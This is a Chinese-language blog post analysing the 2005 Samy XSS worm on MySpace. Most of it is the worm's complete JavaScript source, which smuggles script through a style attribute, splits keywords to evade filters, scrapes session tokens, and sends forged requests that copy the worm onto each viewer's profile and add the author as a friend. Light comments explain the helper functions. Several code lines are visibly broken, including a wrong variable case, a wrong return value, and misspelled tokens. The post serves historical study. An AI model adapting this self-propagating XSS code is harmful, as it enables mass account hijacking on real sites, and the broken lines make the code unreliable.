Samy XSS Worm 分析

最新推荐文章于 2021-04-10 00:41:35 发布
最新推荐文章于 2021-04-10 00:41:35 发布
阅读量1.8k 收藏 5
点赞数 4
分类专栏: XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x728999452/article/details/51999522
版权

Samy Worm

MySpace.com允许用户通过控制标签的style属性,samy构造css xss。

MySpace过滤了很多关键字,利用拆分法绕过。

div标签如下:

<div id = mycode style="BACKGROUND: url('javascript:eval(document.all.mycode.expr)')"
	expr=" "></div>


其中expr字符串的内容为如下javascript代码:

var B = String.fromCharCode(34);
var A = String.fromCharCode(39);
/*
fromCharCode() 可接受一个指定的 Unicode 值,然后返回一个字符串。
语法
String.fromCharCode(numX,numX,...,numX)

B="	A='
*/

function g () 
{
	var C;
	try
	{
		var D = document.body.createTextRange();
		C = D.htmlText;
	}
	catch(e)
	{
	}

	if(C)
	{
		return C;
	}
	else
	{
		return eval('document.body.inne'+'rHTML');
	}
}
/*
createTextRange 只能在IE下工作
该函数用于取得该页面body的HTML
*/

function getData(AU)
{
	M = getFromURL(AU,'friendID');
	L = getFromURL(AU,'Mytoken');
}
/*
getFromURL函数在后面
*/

function getQueryParams()
{
	var E = document.location.search;
	var F = E.substring(1,E.length).split('&');
	var AS = new Array();

	for(var O=0; O < F.length; O++)
	{
		var I = F[O].split('=');
		AS[I[0]] = I[1];
	}
	return AS;
}
/*
例:URL为:https://www.baidu.com/s?wd=c%2B%2B&rsv_spt=1
此时E = document.location.search = ?wd=c%2B%2B&rsv_spt=1

split('&')把一个字符串E以'&'为seprator分割成字符串数组F
split('=')把数组元素F[O]以'='为seprator分割为键值对,I[0]为键,I[1]为值
存入AS数组
*/

var J;
var AS = getQueryParams();
var L = AS['Mytoken'];
var M = AS['friendID'];

if(location.hostname=='profile.myspace.com')
{
	document.location = 'http://www.myspace.com'+location.pathname+location.search;
}
else
{
	if(!M)
	{
		getData(g());
	}
	main();
}
/*
修改document.location把用户带到一个新的地址

URL: http://china.huanqiu.com/photo/2016-07/2838944.html?from=bdtp#p=1
location.hostname = china.huanqiu.com
location.pathname = /photo/2016-07/2838944.html
location.search = ?from=bdtp
有关location对象,http://www.w3school.com.cn/jsref/dom_obj_location.asp

main()函数在后面
*/

function getClientFID()
{
	return findIn(g(),'up_launchIC( '+A, A);
}
/*
findIn(BF,BB,BC)函数在后面
*/

function nothing()
{
}

function paramsToString(AV)
{
	var N = new String();
	var O = 0;
	for(P in AV)
	{
		if(O > 0)
		{
			N += '&';
		}
		var Q = escape(AV[P]);

		while(Q.indexOf('+') != -1)
		{
			Q = Q.replace('+', '%2B');//‘+’的URL编码'%2B'
		}

		while(Q.indexOf('&') != -1)
		{
			Q = Q.replace('&', '%26');//‘%’的URL编码'%26'
		}

		N += P + '=' + Q;
		O++;
	}

	return N;
}

function httpSend(BH, BI, BJ, BK)
{
	if(!J)
		return false;

	eval('J.onr'+'eadystatechange = BI');

	j.open(BJ,BH,true);

	if(BJ == 'POST')
	{
		J.setRequestHeader('Content-type', 'application/x-www-form-urllencoded');
		J.setRequestHeader('Content-Length', BK.length);
	}

	J.send(BK);

	return true;
}
/*
Ajax 发送
*/

function findIn(BF,BB,BC)
{
	var R = BF.indexOf(BB) + BB.length;
	var S = BF.substring(R, R+1024);
	return S.substring(0, S.indexOf(BC));
}
/*
字符串BF中在BB和BC之间的部分
*/

function getHiddenParamter(BF, BG)
{
	return findIn(BF, 'name='+B+BG+B+' value='+B, B);
}

function getFromURL(BF,BG)
{
	var T;
	if(BG == 'Mytoken')
	{
		T = B;
	}
	else
	{
		T = '&';
	}

	var U = BG + '=';
	var V = BF.indexOf(U) + U.length;
	var W = BF.substring(V, V+1024);
	var X = W.indexOf(T);
	var Y = W.substring(0,X);

	return Y;
}

function getXMLObj()
{
	var Z = false;
	if(window.XMLHttpRequest)
	{
		try
		{
			Z = new XMLHttpRequest();
		}
		catch(e)
		{
			Z = false;
		}
	}
	else
	{
		try
		{
			Z = new ActiveXObject('Msxml2.XMLHTTP');
		}
		catch(e)
		{
			try
			{
				Z = new ActiveXObject('Microsoft.XMLHTTP');
			}
			catch(e)
			{
				Z = false;
			}
		}
	}

	return X;
}
/*
Ajax
*/

var AA = g();
var AB = AA.indexOf('m'+'ycode');
var AC = AA.substring(AB, AB+4096);
var AD = AC.indexOf('D'+'IV');
var AE = AC.substring(0,AD);
var AF;

if(AE)
{
	AE = AE.replace('jav'+'a', A+'jav'+'a');
	AE = AE.replace('exp'+'r)', 'exp'+'r)'+A);
	AF = 'but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>';
}

var AG;

function getHome()
{
	if(J.readyState != 4)
		return;

	var AU = J.responseText;
	AG = findIn(AU, 'P'+'rofileHeroes','</td>');
	AG = AG.substring(61,AG.length);

	if(AG.indexOf('samy')== -1)
	{
		if(AF)
		{
			AG+=AF;
			var AR = getFromURL(AU,'Mytoken');
			var AS = new Array();
			AS['interestLabel'] = 'heroes';
			AS['submit'] = 'Preview';
			AS['interest'] = AG;
			J = getXMLObj();
			httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR, postHero, 'POST',
				paramsToString(AS));
		}
	}
}

function postHero()
{
	if(J.readyState != 4)
		return;

	var AU = J.responseText;
	var AR = getFromURL(AU,'Mytoken');
	var AS = new Array();
	AS['interestLabel'] = 'heroes';
	AS['submit'] = 'Submit';
	AS['interest'] = AG;
	AS['hash'] = getHiddenParamter(AU,'hash');
	httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR, nothing, 'POST',
			paramsToString(AS));
		
}

function main()
{
	var AN = getClientFID();
	var BH = '/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&MyTkoen='+L;
	J = getXMLObj();
	httpSend(BH,getHome,'GET');
	xmlhttp2 = getXMLObj();
	httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,
		processxForm,'GET');
}

function processxForm()
{
	if(xmlhttp2.readyState != 4)
		return;

	var AU = xmlhttp2.responseText;
	var AQ = getHiddenParamter(AU, 'hashcode');
	var AR = getFromURL(AU, 'MyToken');
	var AS = new Array();
	AS['hashcode'] = AQ;
	AS['friendID'] = '11851658';
	AS['submit'] = 'Add to Friends';
	httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&MyToken='+AR,nothing,
		'POST',paramsToString(AS));
}

function httpSend2(BH, BI, BJ, BK)
{
	if(!xmlhttp2)
		return falsa;

	eval('xmlhttp2.onr'+'eadystatechange=BI');
	xmlhttp2.open(BJ,BH,true);

	if(BJ=='POST')
	{
		xmlhttp2.setRequestHeader('Content-type','application/x-www-form-urllencoded');
		xmlhttp2.setRequestHeader('Content-Length', BK.length);

	}
	xmlhttp2.send(BK);
	return true;
}


回忆里的褶皱
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
关于"Samy Worm"技术分析及源代码
u013481921的专栏
01-15 1085
说到Web安全和XSS跨站脚本技术,几乎所有的书都会提到Samy Worm,这是在2005年感染了mySpace社交网络上百万用户的蠕虫。正如Morris蠕虫是互联网第一个蠕虫, Samy Worm则是第一个XSS的蠕虫。因此研究XSS技术最好了解一下这个只要浏览了profile就自动把对方加为好友并列为偶像的代码的实现技术。 以下是根据对Samy Worm分析的文章进行的大致翻译: 1)
Samy XSS Worm之源码讲解
weixin_34138056的博客
04-09 304
说到Web安全和XSS跨站脚本技术,几乎所有的书都会提到Samy Worm,这是在2005年感染了mySpace社交网络上百万用户的蠕虫。正如Morris蠕虫是互联网第一个蠕虫, Samy Worm则是第一个XSS的蠕虫。因此研究XSS技术最好了解一下这个只要浏览了profile就自动把对方加为好友并列为偶像的代码的实现技术。 以下是根据对Samy Worm分析的文章进行的大致翻译: 1)  ...
XSS攻击——SamyWorm 源代码分析
z646683869的博客
04-10 1168
在2005 年,年仅19 岁的Samy Kamkar 发起了对MySpac巳.com 的XSS Worm 攻击。Samy Kamkar 的蠕虫在短短几小时内就感染了100 万用户一一它在每个用户的自我简介后边加了一句话"but most of all, Samy is my hero." (Samy 是我的偶像〉。这是Web 安全史上第一个重量级的XSS Worm ,具有里程碑意义。 以下为根据对Samy Worm分析的文章进行的格式整理,方便阅读: MySpace 过滤了很多危险的HTML 标签,只保留
新浪微博的XSS漏洞攻击过程详解
weixin_34294649的博客
07-11 1401
今天晚上(2011年6月28日),新浪微博出现了一次比较大的XSS攻击事件。大量用户自动发送诸如:“郭美美事件的一些未注意到的细节”,“建 党大业中穿帮的地方”,“让女人心动的100句诗歌”,“3D肉团团高清普通话版种子”,“这是传说中的神仙眷侣啊”,“惊爆!范冰冰艳照真流出了”等等 微博和私信,并自动关注一位名为hellosamy的用户。 事件的经过线索如下: 20:14,开始有大量带V...
XSS WORM分析
Killua
03-27 786
Token的作用1.防止表单重复提交2.用来作身份验证两者在原理上都是通过session token来实现的。当客户端请求页面时,服务器会生成一个随机数Token,并且将Token放置到session当中,然后将Token发给客户端(一般通过构造hidden表单)。下次客户端提交请求时,Token会随着表单一起提交到服务器端。然后,如果应用于“anti csrf攻击”,则服务器端会对Token值进...
[web安全]黑客攻防技术宝典-浏览器实战篇--XSS Samy Worm
hzeyuan.cn
12-26 1180
今天想了解一下书中介绍的Samy蠕虫病毒。 这是一个在24小时内感染了100多万MySpace用户的病毒,传播速度很快。 这是从网上找来的XSS Samy源代码。 &amp;lt;div id=mycode style=&quot;BACKGROUND: url('java script:eval(document.all.mycode.expr)')&quot; expr=&quot;var B=String.fromCharCod...
anti samy 策略文件
01-24
anti samy 的策略文件,齐全。antisamy.xml,antisamy-anythinggoes.xml,antisamy-ebay.xml,antisamy-myspace.xml,antisamy-slashdot.xml,antisamy-tinymce.xml
Link Share By Samy-crx插件
04-04
Samy的链接共享是一种工具,可让您共享从桌面到移动设备的任何网站链接。 只需访问任何网站,然后单击我们的Google扩展程序图标,它将为该网站生成QR码。 您要做的就是从您的移动设备扫描QR Code,并在几秒钟之内...
搜索框——不能忽视的XSS漏洞—搜索框所引起的XSS漏洞
06-12
**搜索框的XSS漏洞分析** 许多网站,尤其是知名的电子商务平台,如淘宝、当当和亚马逊中国,其搜索功能可能存在过滤不足的问题。攻击者可以利用搜索关键词,使得搜索结果页面展示恶意脚本。例如,通过在搜索框输入...
How to Make an Operating System from Scratch (Samy Pesse) .pdf
最新发布
12-06
在《如何从零开始制作操作系统》(Samy Pesse)这本书中,作者详细介绍了创建一个基于C/C++的操作系统的过程。该书是作者在高中时期的一个早期项目,尽管有些部分需要重构,但仍然是学习操作系统原理和实践的好资源...
第一次听说因为写了一段 JavaScript 代码入狱了
weixin_37097680的博客
03-07 364
背景几行代码让他增粉 100W 最后入狱,他就是著名 Samy 蠕虫病毒的作者 Samy Kamkar,通过 Samy 蠕虫成功为自己新增 100W 粉丝最后入狱。这也是一个里程碑,世界上...
MySpace JavaScript蠕虫(Samy worm)作者的自述
负暄琐话
10-20 4033
精彩!文章详细介绍了Samy Worm怎么绕过MySpace的安全机制,成功传播这个“有意思”的蠕虫,让上百万人在20小时内感染蠕虫,把作者加到自己的My Heroes名单,最终当掉很多人的帐户。这里是故事。这里是技术细节。 这里是作者访谈。 嗯,该和部门里负责安全的人谈谈了。P.S. 脚本破小孩儿们就不用去试了。MySpace已经把作者提到的漏洞补上了。
XSS——XSS Worm
王嘟嘟的博客
09-21 1569
0x00 前言 之前也从来没有学习到类似的东西,xss蠕虫,以前只是听说过,没想到是xss的蠕虫,还是长见识了。破万卷书,作用还是很明显的。 0x01 学习笔记 1.第一个web2.0蠕虫病毒 2005年10月4日,第一个web2.0 蠕虫诞生了,在国外的社交网络MySpace上写了一段Javascript蠕虫代码。 2.实质 蠕虫的实质就是一段脚本程序,通常用JavaScript或者VBScri...
关于Myspace 蠕虫攻击的代码分析
u012684933的专栏
04-02 1670
myspace蠕虫攻击是xss攻击的一个非常典型的案例,网上也有关于这个蠕虫攻击的原理分析, 英文地址如下:http://namb.la/popular/tech.html 中文翻译地址如下:http://blog.csdn.net/ssergsw/article/details/9259743 看完文章的翻译后,非常感叹作者对漏洞巧妙的利用。 我对web前端开发是菜鸟,所以抱着学习jav
xss攻击之新浪微博xss蠕虫
zhangzhangdan的博客
07-21 2591
xss蠕虫:通过一个bug,感染其他结构都出现问题 我们根据一段xss攻击链接来看一下: 很显然,javascript代码被解析了,那它原型是什么呢,怎么看  通过这样我们可以看出,这段javascript代码是指向一个js文件,js文件中写的是一些文章标题链接,而这段链接也是携带这段javascript代码,这样当有人点击了这段链接,就又执行这个xss攻击操作了,这样一传十,十传百...
基于Antisamy项目实现防XSS攻击
热门推荐
gavinloo的专栏
11-06 1万+
最近项目上线,请第三方公司进行了一次渗透性测试,被发现存在多处XSS攻击。由于我们对于URL的Get请求已经通过URLFilter进行了特殊字符过滤,Get请求的漏洞已经被封堵,但是对于Post请求考虑到我们项目存在表单提交,富文本编辑等功能,不敢贸然的使用Filter对关键字进行过滤。 为了解决上述问题,我们采用了OWASP的一个开源的项目AntiSamy来彻底解决XSS攻击问题。AntiSa
XSS学习笔记(六)-XSS蠕虫
byteway的专栏
04-28 4798
3.XSS蠕虫 对于XSS蠕虫,无非就是在客户端提交的时候绕过过滤和转义,可以在继续在浏览器端执行的js 等代码,这里提供几种加密方式: 原型:alert(XSS) URL Encode: 大小写(所谓URL编码就是:把所有非字母数字字符都将被替换成百分号(%)后跟两位十六进制数,空格则编码为加号(+)) %3cscript%3ealert('XSS')%3c/script
一只XSS蠕虫的实现
0ffs3t
03-08 3914
Author: kunting520 EMail: kunting520@gmail.com Date: 2011-06-20 [ 目录 ] 0×-1 声明 0×00 前言 0×01 关于XSS 0×02 发现XSS 0×03 蠕虫实现 0×04 总结 0×-1 声明 前两天,在土司上发一帖子(http://t00ls.net/thread-16240-1-2
Samy worms致使MySpace一天关闭的XSS攻击
Mr_Loving的专栏
11-26 992
Full source code of worm at bottom. Please note that this code and explanation was only released AFTER MySpace resolved this. None of this would work on MySpace at the time it was released and it wi

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值